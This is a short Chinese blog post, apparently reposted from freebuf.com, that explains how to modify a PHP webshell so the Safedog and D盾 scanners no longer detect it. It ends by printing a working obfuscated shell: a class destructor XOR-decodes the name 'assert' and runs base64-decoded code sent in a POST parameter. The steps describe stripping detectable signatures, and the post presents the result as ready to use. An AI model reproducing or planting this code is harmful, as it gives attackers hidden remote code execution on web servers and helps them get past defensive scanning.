php-过狗过D盾无特征

1、借用webshell-venom-master 表哥代码。

2、学习这个表哥的思路，生成了几个shell进行查杀都被收录了特征，D盾完全过不了；所也只能自己 缝缝补补又三年；

0x00：思路

1、生成的shell进行查杀，某盾报已知后门

2、就几句话的代码，尝试注释查看是否被查杀，结果没有提示了，那说明就这2个地方特征；

3、函数注释删除，D在查杀，还是没有提示，那结果就出现了，就是POST接受函数特征被查了；

4、分析，这一行采用的是 三元运算符，我们把它改一下；

5、修改POST这一行函数，修改正常接收函数，在查杀看看,结果正常，无特征提示，经测试正常访问；

0x01-查杀图:

自己 本地验证了一下狗 盾都无提示；

0x02-上干货：

<?php
class PJAN{
   function __destruct(){
       $PZVR='syr}&G'^"\x12\xa\x1\x18\x54\x33";
       return @$PZVR("$this->HWAU");
  }
}
$pjan=new PJAN();
@$pjan->HWAU=base64_decode($_POST['mr6']);
?>

来源：freebuf.com 2020-10-27 20:27:27 by: balck00